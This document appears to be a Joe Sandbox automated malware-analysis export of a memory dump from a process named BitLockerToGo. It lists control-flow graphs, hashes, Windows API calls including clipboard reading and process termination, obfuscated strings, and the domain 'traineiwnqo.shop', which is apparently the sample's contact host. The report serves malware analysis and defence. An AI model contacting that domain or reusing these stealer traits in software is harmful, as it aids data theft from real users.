          • Instruction ID: e03916a7da5e6ba0c2f8091f46f4f555eff45ce801cd2f5b07f95acf9bdb28f2
          • Opcode Fuzzy Hash: 92b6d4bfff756f377c6c1701a031c2bd17822f1c5fd609856eeba8f65b243fd3
          • Instruction Fuzzy Hash: B73263B4518340DFE710DF25E884B6ABBB6FF85300F1699ADE4985B362C7749801CF9A

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 571 433dd2-433dd9 572 433e43-433e46 571->572 573 433de0-433dfa 571->573 574 433e30-433e3d RtlFreeHeap 573->574 575 433dfc-433dff 573->575 574->572 576 433e00-433e2e 575->576 576->574 576->576
          APIs
          • RtlFreeHeap.NTDLL(?,00000000), ref: 00433E3D
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: 908193a484c15671baeb4a38a4b4353498f707b7aacb43765837dcf0fca68e39
          • Instruction ID: eb20d6f6faef0c722aa8bbd71a1406ec935fcb9b6a2d710ae203e08c584c4237
          • Opcode Fuzzy Hash: 908193a484c15671baeb4a38a4b4353498f707b7aacb43765837dcf0fca68e39
          • Instruction Fuzzy Hash: 88014F3410C2808BD309DF18C9A1A2AFBE6EF96705F148A5DD5D6433A1C6359850CB4A

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 581 435da0-435dd2 LdrInitializeThunk
          APIs
          • LdrInitializeThunk.NTDLL(0040EA26,?,00000001,?), ref: 00435DCE
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: InitializeThunk
          • String ID:
          • API String ID: 2994545307-0
          • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
          • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
          • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
          • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 582 435e33-435e61 583 435e63 582->583 584 435ea0-435ead 582->584 585 435e70-435e9e 583->585 586 435eb3-435eb7 584->586 587 4362a8-4362c8 584->587 585->584 585->585 590 435ec0-435ec6 586->590 588 436300-43630d 587->588 589 4362ca 587->589 592 436313-436317 588->592 593 4363e5-4363e8 588->593 591 4362d0-4362fe 589->591 594 435ed4-435ed9 590->594 595 435ec8-435ecd 590->595 591->588 591->591 596 436320-436326 592->596 598 436412-43641d 593->598 599 436702-436738 593->599 600 4363f0 593->600 601 436410 593->601 602 436610 593->602 603 436606-43660f 593->603 604 436424-43650e 593->604 605 436654-43668a 593->605 606 4363f8-43640f call 437ea0 593->606 607 43650f 593->607 594->587 608 435edf-435eeb call 435da0 594->608 595->590 597 435ecf 595->597 611 4363cc-4363d1 596->611 612 43632c-436331 596->612 597->587 598->599 598->602 598->603 598->604 598->605 598->607 609 436771-43677e 599->609 610 43673a 599->610 600->606 602->605 603->602 615 4366c1-4366ce 605->615 616 43668c-43668f 605->616 606->601 607->603 626 435ef0-435ef3 608->626 609->605 620 436784 609->620 619 436740-43676f 610->619 611->593 622 4363d3-4363dd call 435da0 611->622 612->596 621 436333 612->621 624 4366d0-4366d4 615->624 625 4366fc 615->625 623 436690-4366bf 616->623 619->609 619->619 629 436788 620->629 621->593 630 4363e2 622->630 623->615 623->623 628 4366e0-4366e6 624->628 625->625 626->587 631 4366f1-4366f6 628->631 632 4366e8-4366ed 628->632 629->629 630->593 631->625 633 43678d-4367a1 call 435da0 631->633 632->628 634 4366ef 632->634 636 4367a6-4367d5 633->636 634->625 638 4367d7 636->638 639 436815-436820 636->639 640 4367e0-436813 638->640 639->599 639->602 639->603 639->605 639->607 640->639 640->640
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: 4`[b
          • API String ID: 0-3962175265
          • Opcode ID: 955187d182e6d048e01c883de59f737c40fb6c1cc6040005dcec5b4f59e16f57
          • Instruction ID: 55f62c6f804c7cf4b8bdc42aaed63704e86565d7fc3cb0259a1df8de189eacb3
          • Opcode Fuzzy Hash: 955187d182e6d048e01c883de59f737c40fb6c1cc6040005dcec5b4f59e16f57
          • Instruction Fuzzy Hash: 47717A742083429BD708CF04D5A1A2BF7E2FFDA315F65991DE082873A1C339D845CBAA

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 666 4367b0-4367d5 667 4367d7 666->667 668 436815-436820 666->668 669 4367e0-436813 667->669 670 436702-436738 668->670 671 436610 668->671 672 436606-43660f 668->672 673 436654-43668a 668->673 674 43650f 668->674 669->668 669->669 675 436771-43677e 670->675 676 43673a 670->676 671->673 672->671 677 4366c1-4366ce 673->677 678 43668c-43668f 673->678 674->672 675->673 680 436784 675->680 679 436740-43676f 676->679 682 4366d0-4366d4 677->682 683 4366fc 677->683 681 436690-4366bf 678->681 679->675 679->679 685 436788 680->685 681->677 681->681 684 4366e0-4366e6 682->684 683->683 686 4366f1-4366f6 684->686 687 4366e8-4366ed 684->687 685->685 686->683 688 43678d-4367a1 call 435da0 686->688 687->684 689 4366ef 687->689 691 4367a6 688->691 689->683 691->666
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a93e2bfca1d7aa7255c8a95b3e15d5247c32dca99487630a8c543496bfcf4908
          • Instruction ID: 5ab6b32e41413d5c8c420ceb0bf7328a98a469101a76827d740cdd4aca41d802
          • Opcode Fuzzy Hash: a93e2bfca1d7aa7255c8a95b3e15d5247c32dca99487630a8c543496bfcf4908
          • Instruction Fuzzy Hash: CE513874108342ABD308CF14D595A2BBBF2EB8A745F559C1DF09697391C338D848CBAB

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 40b270-40b2c8 1 40b306-40b31a LoadLibraryExW call 435000 0->1 2 40b2ca 0->2 5 40b31f-40b323 1->5 3 40b2d0-40b304 2->3 3->1 3->3 6 40b978-40b984 5->6 7 40b329-40b449 call 437690 * 12 5->7 32 40b450-40b468 call 430bd0 7->32 35 40b470-40b477 32->35 35->35 36 40b479-40b48b 35->36 37 40b4f1-40b501 call 40b990 36->37 38 40b48d-40b496 36->38 46 40b744-40b751 37->46 47 40b507-40b50d 37->47 39 40b4a0-40b4a3 38->39 41 40b4e0-40b4e3 39->41 42 40b4a5-40b4c4 call 40d620 39->42 45 40b4e6-40b4ea 41->45 55 40b4c6-40b4cc 42->55 56 40b4ce-40b4d4 42->56 45->37 49 40b771-40b778 46->49 50 40b753-40b757 46->50 47->32 48 40b513-40b617 GetProcessVersion 47->48 52 40b654-40b66d call 40bf10 48->52 53 40b619 48->53 49->6 54 40b760-40b76f 50->54 60 40b673-40b6c8 52->60 61 40b77d-40b77f 52->61 57 40b620-40b652 53->57 54->49 54->54 55->39 55->56 56->45 57->52 57->57 62 40b704-40b70f 60->62 63 40b6ca 60->63 61->6 65 40b711-40b715 62->65 66 40b784 62->66 64 40b6d0-40b702 63->64 64->62 64->64 68 40b727-40b72b 65->68 67 40b786-40b788 66->67 69 40b96a 67->69 70 40b78e-40b7b7 67->70 68->69 71 40b731-40b738 68->71 72 40b96c-40b975 call 433dc0 69->72 73 40b7f4-40b7fd 70->73 74 40b7b9 70->74 75 40b73a-40b73c 71->75 76 40b73e 71->76 72->6 81 40b834-40b836 73->81 82 40b7ff-40b809 73->82 80 40b7c0-40b7f2 74->80 75->76 77 40b720-40b725 76->77 78 40b740-40b742 76->78 77->67 77->68 78->77 80->73 80->80 81->69 84 40b83c-40b844 81->84 85 40b817-40b81b 82->85 86 40b850-40b858 84->86 85->69 87 40b821-40b828 85->87 86->86 90 40b85a-40b85c 86->90 88 40b82a-40b82c 87->88 89 40b82e 87->89 88->89 91 40b810-40b815 89->91 92 40b830-40b832 89->92 93 40b8a5-40b8b4 90->93 94 40b85e-40b860 90->94 91->81 91->85 92->91 96 40b8c0-40b8c7 93->96 95 40b87f-40b88a 94->95 97 40b873-40b87d 95->97 98 40b88c-40b89e 95->98 96->96 99 40b8c9-40b8df 96->99 97->93 97->95 102 40b870 98->102 103 40b8a0-40b8a3 98->103 100 40b8e1 99->100 101 40b91d-40b92d call 40b990 99->101 104 40b8e3-40b8e7 100->104 101->69 110 40b92f-40b93c 101->110 102->97 103->102 106 40b917-40b91a 104->106 107 40b8e9-40b905 call 40d620 104->107 106->101 114 40b907-40b90d 107->114 115 40b90f-40b915 107->115 112 40b961-40b968 110->112 113 40b93e-40b942 110->113 112->72 116 40b950-40b95f 113->116 114->104 114->115 115->101 116->112 116->116
          APIs
          • LoadLibraryExW.KERNELBASE(6BF36DE7,00000000,00000800), ref: 0040B312
          • GetProcessVersion.KERNEL32(00000000), ref: 0040B515
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: LibraryLoadProcessVersion
          • String ID: @VCL$IXY $JBNJ$OO[R$XMS$mBXZ$traineiwnqo.shop
          • API String ID: 1829952579-883954736
          • Opcode ID: 373a0f9e22c94c5bae2a4f5218bb5401487035fb1ccb6e8811359d5ff006948c
          • Instruction ID: 064b0f1f99778e1a1520897e318e5f958ceea2eaa0b073473360c069028d18cb
          • Opcode Fuzzy Hash: 373a0f9e22c94c5bae2a4f5218bb5401487035fb1ccb6e8811359d5ff006948c
          • Instruction Fuzzy Hash: 4D02C0B45083408FD310EF15D99166ABBE1EF92304F54893EE4C5AB3A2E3798905CF9E

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 232 4350b0-4350bb 233 4350c2-4350cd 232->233 234 435130-43513b 232->234 235 435230-43523b 232->235 236 4350e6-4350f1 232->236 237 435305-435310 232->237 238 4350d4-4350df 232->238 239 4350f8 232->239 233->235 233->236 233->237 233->238 233->239 240 435142-43514d 234->240 241 4352a0-4352ab 234->241 242 435060-43506b 234->242 243 435166-43516e 234->243 244 435154-43515f 234->244 245 435242-43524d 235->245 246 4355b6-4355ca 235->246 247 435266-43526c 235->247 248 435254-43525f 235->248 249 4353ca-4353d5 235->249 236->233 236->234 236->235 236->236 236->237 236->238 236->239 250 435317-43531f 237->250 251 435614-435628 237->251 252 43555a-435565 237->252 253 43556c-43557e 237->253 238->236 238->237 238->239 239->234 240->242 240->243 240->244 262 4352b2-4352bd 241->262 263 4354e1-4354e9 241->263 264 4352d6-4352dc 241->264 265 4352c4-4352cf 241->265 266 4355f4-43560a 241->266 267 43540b-435416 241->267 256 435072-435086 242->256 257 43508d-4350a3 242->257 243->235 244->240 244->241 244->242 244->243 244->244 258 435457-43548c 244->258 245->246 245->247 245->248 259 435632-435648 245->259 246->266 247->241 247->245 247->246 247->247 247->248 247->249 247->259 261 435329-43536e 247->261 248->247 248->259 254 435451 249->254 255 4353dc-4353e2 249->255 250->261 251->259 252->251 252->253 253->250 253->251 253->252 253->253 260 43559b-4355af 253->260 254->258 255->254 255->255 255->267 256->256 256->257 257->232 271 43548e-43548f 258->271 272 4354bc-4354d7 call 437130 258->272 273 435683-435693 259->273 260->246 260->260 270 43541d-435425 260->270 268 435370-43539a 261->268 269 43539c-4353a8 LoadLibraryExW 261->269 262->263 262->264 262->265 262->266 263->252 264->237 264->262 264->263 264->264 264->265 264->266 264->267 265->263 265->264 266->251 267->260 267->270 268->268 268->269 269->273 274 4353ae-4353c0 269->274 270->254 275 435490-4354ba 271->275 272->263 277 435a98-435aad 273->277 274->249 275->272 275->275 280 435ab4-435abf 277->280 280->277 280->280 281 435a43-435a4e 280->281 282 435c21-435c3a 280->282 283 435c61-435c7a 280->283 284 435b66-435b8f 280->284 285 435ac6-435ada 280->285 286 435824-43582f 280->286 287 435848 280->287 288 43584e-435860 call 42ff30 280->288 289 435812-43581d 280->289 290 435a31-435a3c 280->290 291 435870-43587b 280->291 292 435b30-435b3d 280->292 293 435b96-435baf 280->293 294 435836-435841 280->294 295 435bd6-435bef 280->295 296 435bb6-435bcf 280->296 297 435a55-435a69 280->297 298 4359bb-435a2a call 437690 * 3 call 435de0 280->298 299 435b1e-435b29 280->299 281->277 281->280 281->282 281->283 281->284 281->285 281->286 281->287 281->288 281->289 281->291 281->292 281->293 281->294 281->295 281->297 282->277 282->283 282->284 282->285 283->277 283->284 283->292 283->295 302 435c81-435c9a 283->302 284->277 327 435c41-435c5a 284->327 285->277 285->284 285->299 300 435882-43588d 285->300 301 435a82-435a8f 285->301 285->302 303 4358a6-435950 call 437690 * 4 285->303 304 435b46-435b5f 285->304 305 435d66 285->305 306 435cea-435cf1 285->306 307 435c08-435c1a 285->307 308 435a70-435a7b 285->308 309 435bf6-435c01 285->309 310 435894-43589f 285->310 286->287 286->293 286->294 288->291 289->280 289->286 289->287 289->293 289->294 290->277 290->280 290->281 290->282 290->283 290->284 290->285 290->286 290->287 290->288 290->289 290->291 290->292 290->293 290->294 290->295 290->296 290->297 291->300 291->307 291->308 291->309 291->310 292->304 293->277 293->284 293->285 293->296 294->277 294->282 294->284 294->285 294->287 294->288 295->277 295->280 295->282 295->284 295->285 295->286 295->287 295->288 295->289 295->291 295->293 295->294 295->309 296->277 296->280 296->282 296->284 296->285 296->286 296->287 296->288 296->289 296->291 296->292 296->293 296->294 296->295 297->277 297->280 297->282 297->284 297->285 297->286 297->287 297->288 297->289 297->291 297->292 297->293 297->294 297->295 297->308 298->277 298->280 298->281 298->282 298->283 298->284 298->285 298->286 298->287 298->288 298->289 298->290 298->291 298->292 298->293 298->294 298->295 298->296 298->297 298->299 299->277 299->280 299->282 299->284 299->285 299->286 299->287 299->288 299->289 299->291 299->292 299->293 299->294 299->295 300->307 300->309 300->310 301->277 302->277 302->284 302->306 344 435952 303->344 345 43598a-4359ab call 437130 303->345 304->277 304->284 304->305 304->306 319 435d67 call 433d50 305->319 314 435d92-435d96 306->314 315 435d71-435d7a call 433dc0 306->315 316 435d90 306->316 317 435cf8-435d14 306->317 307->277 307->282 307->284 307->301 307->303 307->304 307->305 307->306 308->277 308->284 308->301 308->304 308->305 308->306 309->277 309->284 309->301 309->302 309->303 309->304 309->305 309->306 309->307 310->277 310->284 310->301 310->303 310->304 331 435d7c-435d82 315->331 316->314 323 435d50-435d64 317->323 324 435d16 317->324 325 435d6c-435d6f 319->325 323->331 330 435d20-435d4e 324->330 325->331 327->277 327->284 330->323 330->330 331->316 347 435960-435988 344->347 345->298 347->345 347->347
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: f[C$sV>$sV>
          • API String ID: 0-1742038981
          • Opcode ID: dca4f72511be7345964931585ac2be24a3dab814cca54a8cdd4b1995ec398d1a
          • Instruction ID: 459b7a90221e3825e19f6dcee74ee2924d5d68c1ab25a9685ba17e356392434e
          • Opcode Fuzzy Hash: dca4f72511be7345964931585ac2be24a3dab814cca54a8cdd4b1995ec398d1a
          • Instruction Fuzzy Hash: CEA1D47E6241A4DFCB145F7CF9911AEB7B1AB4F352F5A0CB4C44293260E3398A86CB54

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 350 40a100-40a10f 351 40a113-40a11f 350->351 352 40a3c2-40a3cc 351->352 353 40a125-40a12f 351->353 355 40a44d 352->355 356 40a135-40a13f 353->356 357 40a399-40a3bd TerminateProcess 353->357 355->351 359 40a145-40a14f 356->359 360 40a349-40a353 356->360 357->355 362 40a271 call 435040 359->362 363 40a155-40a15f 359->363 360->355 368 40a276-40a27d 362->368 366 40a165-40a16f 363->366 367 40a3ea-40a403 363->367 373 40a2a4 call 42adb0 366->373 374 40a175-40a17f 366->374 371 40a404-40a417 367->371 369 40a284-40a28a 368->369 370 40a27f 368->370 369->355 370->369 371->355 377 40a2a9-40a2b9 373->377 378 40a185-40a18f 374->378 379 40a367-40a376 call 435cb0 374->379 377->355 383 40a195-40a19f 378->383 384 40a2be-40a2c8 378->384 379->355 388 40a1a5-40a1af 383->388 389 40a38a-40a394 383->389 386 40a2ca 384->386 387 40a2cf-40a2d5 384->387 386->387 387->355 391 40a1b5-40a1bf 388->391 392 40a3ce-40a3d8 388->392 389->355 391->371 394 40a1c5-40a1cf 391->394 392->355 396 40a1d5-40a1df 394->396 397 40a3da-40a3e4 394->397 399 40a321 call 40d790 396->399 400 40a1e5-40a1ef 396->400 397->355 403 40a326-40a335 call 40c650 399->403 404 40a1f5-40a1ff 400->404 405 40a3e6-40a3e9 400->405 403->355 409 40a312-40a31c 404->409 410 40a205-40a20f 404->410 409->355 412 40a211-40a21b 410->412 413 40a28f-40a29f GetCurrentProcess 410->413 415 40a221-40a22b 412->415 416 40a43f-40a447 412->416 413->355 418 40a231-40a23b 415->418 419 40a37b-40a385 415->419 416->355 422 40a241-40a24b 418->422 423 40a33a-40a344 418->423 419->355 425 40a251-40a25b 422->425 426 40a358-40a362 422->426 423->355 428 40a261-40a268 425->428 429 40a419-40a43d TerminateProcess 425->429 426->355 431 40a2da-40a2f4 GetWindowInfo call 40b270 428->431 432 40a26a-40a26c 428->432 429->355 435 40a2f9-40a300 431->435 432->355 436 40a302 435->436 437 40a307-40a30d 435->437 436->437 437->355
          APIs
          • GetCurrentProcess.KERNEL32 ref: 0040A28F
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: CurrentProcess
          • String ID:
          • API String ID: 2050909247-0
          • Opcode ID: 6cbb73408acb59ed4db33d4775c4bf5a2e1f5fb954a14be8ea85e258cb4c0f60
          • Instruction ID: 51fbb555b9d370e3692862816e476a2db59de2d609e19ce943ac933125e09400
          • Opcode Fuzzy Hash: 6cbb73408acb59ed4db33d4775c4bf5a2e1f5fb954a14be8ea85e258cb4c0f60
          • Instruction Fuzzy Hash: EC71913861C340CBCB099F78C16853A7BD1AB91348F51457FA8876F3E0D67C9826AB5B

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 518 40d790-40d7c2 519 40d7c4 518->519 520 40d818-40d896 518->520 521 40d7d0-40d816 519->521 522 40d898 520->522 523 40d8ee-40d8ff 520->523 521->520 521->521 524 40d8a0-40d8ec 522->524 525 40d901-40d908 523->525 526 40d91b-40d923 523->526 524->523 524->524 529 40d910-40d919 525->529 527 40d925-40d926 526->527 528 40d93b-40d945 526->528 530 40d930-40d939 527->530 531 40d947-40d94b 528->531 532 40d95b-40d963 528->532 529->526 529->529 530->528 530->530 533 40d950-40d959 531->533 534 40d965-40d966 532->534 535 40d97b-40dab2 532->535 533->532 533->533 536 40d970-40d979 534->536 537 40db01-40db43 535->537 538 40dab4 535->538 536->535 536->536 540 40db45 537->540 541 40db9a-40dbcc call 40c660 537->541 539 40dac0-40daff 538->539 539->537 539->539 542 40db50-40db98 540->542 545 40dbd3-40dbe0 541->545 546 40dbe7-40dc26 GetSystemDirectoryW 541->546 547 40dc77 541->547 542->541 542->542 545->545 545->546 548 40dc28-40dc2b 546->548 549 40dc2d 546->549 547->547 548->549 550 40dc2e-40dc36 548->550 549->550 551 40dc38-40dc3b 550->551 552 40dc3d 550->552 551->552 553 40dc3e-40dc4b call 409a20 call 430bd0 551->553 552->553 557 40dc50-40dc70 call 433dc0 553->557 557->545 557->546 557->547
          APIs
          • GetSystemDirectoryW.KERNEL32(6BF96DD3,00000104), ref: 0040DBED
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: DirectorySystem
          • String ID: TO$traineiwnqo.shop
          • API String ID: 2188284642-2601519300
          • Opcode ID: da7659f039d2ad96d09439b61ecaa174c4a5b71ef2348cafbeb49aa824987ee6
          • Instruction ID: 2cdc23b5d7e5385279bec43498292fa0782ce986dca6051d641f96f7d62c1df6
          • Opcode Fuzzy Hash: da7659f039d2ad96d09439b61ecaa174c4a5b71ef2348cafbeb49aa824987ee6
          • Instruction Fuzzy Hash: 35B179B05093D08BE3318F25C594B9FBBE2AB8A704F148A6DD8C86B251C7349949CB97

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 560 42e2d4-42e328 call 437690 GetUserDefaultUILanguage 564 42e32d-42e33b 560->564 564->564 565 42e33d 564->565 566 42e344-42e34a 565->566 567 42e384-42e391 566->567 568 42e34c-42e382 566->568 569 42e393 567->569 570 42e398-42e3ac 567->570 568->566 569->570
          APIs
          • GetUserDefaultUILanguage.KERNELBASE ref: 0042E2FB
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: DefaultLanguageUser
          • String ID:
          • API String ID: 95929093-0
          • Opcode ID: 785eed544a71601c7ff247a2735b5923dff7dc13dbc77ca95f9a9498ffca1817
          • Instruction ID: dd10b1c294a43226da38dd84dd8e9094d7a49cf7fdc57e15a8758e2ba235be4e
          • Opcode Fuzzy Hash: 785eed544a71601c7ff247a2735b5923dff7dc13dbc77ca95f9a9498ffca1817
          • Instruction Fuzzy Hash: 59219A70A056988FCB24CB2CED907ADBBB2AF5A311F5442DCE48AA7391C7315E41CF59

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 577 433d50-433d68 578 433d6a 577->578 579 433d9e-433db8 RtlAllocateHeap 577->579 580 433d70-433d9c 578->580 580->579 580->580
          APIs
          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00433DAF
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: 8280a75a012a00ceeaeac738caeb7817f92d77213325f8f085cb60bee0523abc
          • Instruction ID: 9f412bbd7a6109a0698dafb4fec176d59e0e2d40232d6bcdd9cf284ac7ff1406
          • Opcode Fuzzy Hash: 8280a75a012a00ceeaeac738caeb7817f92d77213325f8f085cb60bee0523abc
          • Instruction Fuzzy Hash: 14F0F47420C2409BD305EF18D990A1ABBF1EF9A744F14892DE4C587362C335E825CF5A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: "A$"A$' 8?$4`[b$4`[b$<r$Ev$HU$de$t$zC
          • API String ID: 0-3251056379
          • Opcode ID: b9a61e52cc33f86d36d7462e6d02dc9443a2df4ed359597ac9cc5ffa6758908e
          • Instruction ID: c29d10d54293dc5b770cf99709fc0a62859e1673d9a367d2a7c97bb10d966738
          • Opcode Fuzzy Hash: b9a61e52cc33f86d36d7462e6d02dc9443a2df4ed359597ac9cc5ffa6758908e
          • Instruction Fuzzy Hash: 2D22B8B4608340DFE3149F19E891A2ABBF1FF86344F50592DE5C68B3A2D739D845CB4A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: MzO$!i:o$/.)($4`[b$4`[b$@w$X!f#$d`$d`$rEpG$xQiS$xi$}q$}s
          • API String ID: 0-1556430234
          • Opcode ID: 6076612a897a12d104e5074aa5674c30907ccbe44cc882393121aa00518ad4c5
          • Instruction ID: 9e8b14699c5b30ea174a490e5dddac6aaefe3e7e215f63537efc2ac8c3160455
          • Opcode Fuzzy Hash: 6076612a897a12d104e5074aa5674c30907ccbe44cc882393121aa00518ad4c5
          • Instruction Fuzzy Hash: 9D9275B490025ACFDB18CF54D890AAAFBB1FF4A300F1896A9D455AF752D7349882CFD4
          APIs
          • OpenClipboard.USER32 ref: 0042AAE4
          • GetWindowLongW.USER32 ref: 0042AB09
          • GetClipboardData.USER32 ref: 0042AB19
          • GlobalLock.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DFAE,?), ref: 0042AB38
          • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DFAE), ref: 0042AC28
          • CloseClipboard.USER32 ref: 0042AC33
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
          • String ID: G$[$v$w
          • API String ID: 2832541153-2409301185
          • Opcode ID: ca94ac31f7a09391d2a8d2c45d84298f993af000aef7aa26afde120bdfd5f4f7
          • Instruction ID: 97b8e6c4317eaaa1647a8c533210da23301b94b957612e97d1362c7603054ef9
          • Opcode Fuzzy Hash: ca94ac31f7a09391d2a8d2c45d84298f993af000aef7aa26afde120bdfd5f4f7
          • Instruction Fuzzy Hash: 1A41B07050C7918FD310AF38948832FBFE19B96314F044A2DE4DA47291C7389559CB9B
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: ,$,$.$.$0$[$]$false$null$true${$}$}
          • API String ID: 0-3096720393
          • Opcode ID: d52efc0a24ef29bebffac5565548034d6611479776eaeb195baa045e66cd700f
          • Instruction ID: 6df730f072f63e2d9fc300100cb3c50d51b018d891c432def89b0ebfd95a088f
          • Opcode Fuzzy Hash: d52efc0a24ef29bebffac5565548034d6611479776eaeb195baa045e66cd700f
          • Instruction Fuzzy Hash: F80219B09043069BD7206F26DD497277BE8BF44309F14443AE889A63D3EB7DE905CB5A
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID: MetricsSystem
          • String ID: !Y.[$$iHk$($*M.O$4`[b$95$D$DCFM$F$traineiwnqo.shop$AC$qs
          • API String ID: 4116985748-104136832
          • Opcode ID: 76b5ef2f8b4400fbee944530aff6203b8919b89795f7df8875e5bb5f25088c18
          • Instruction ID: 8950852e522b04e10fe1dd3b982c53cbba2b4e32fe8a9b07e8c12ca551aff0d5
          • Opcode Fuzzy Hash: 76b5ef2f8b4400fbee944530aff6203b8919b89795f7df8875e5bb5f25088c18
          • Instruction Fuzzy Hash: 9562AAB01093808BE324DF16D495B9FBBE1AFC6308F148D2DE4C95B292C7399955CB9B
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
          • String ID: /.)($/.)($1=3!$1u& $: $<$|!;%
          • API String ID: 0-1222258971
          • Opcode ID: a2b923ffa6b332d4a3c247d1da566372a93b9be2640f0db65b8054cfd4f436cb
          • Instruction ID: 2c3a4e4d248b2d077a457603f0eb431a2e8ecc1289d5e5cc3d1cdba081647b06
          • Opcode Fuzzy Hash: a2b923ffa6b332d4a3c247d1da566372a93b9be2640f0db65b8054cfd4f436cb
          • Instruction Fuzzy Hash: A742DB70608301DFC304CF28D890B6AB7E2FF99354F18892DE9968B3A1D339D895CB56
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
          Similarity
          • API ID:
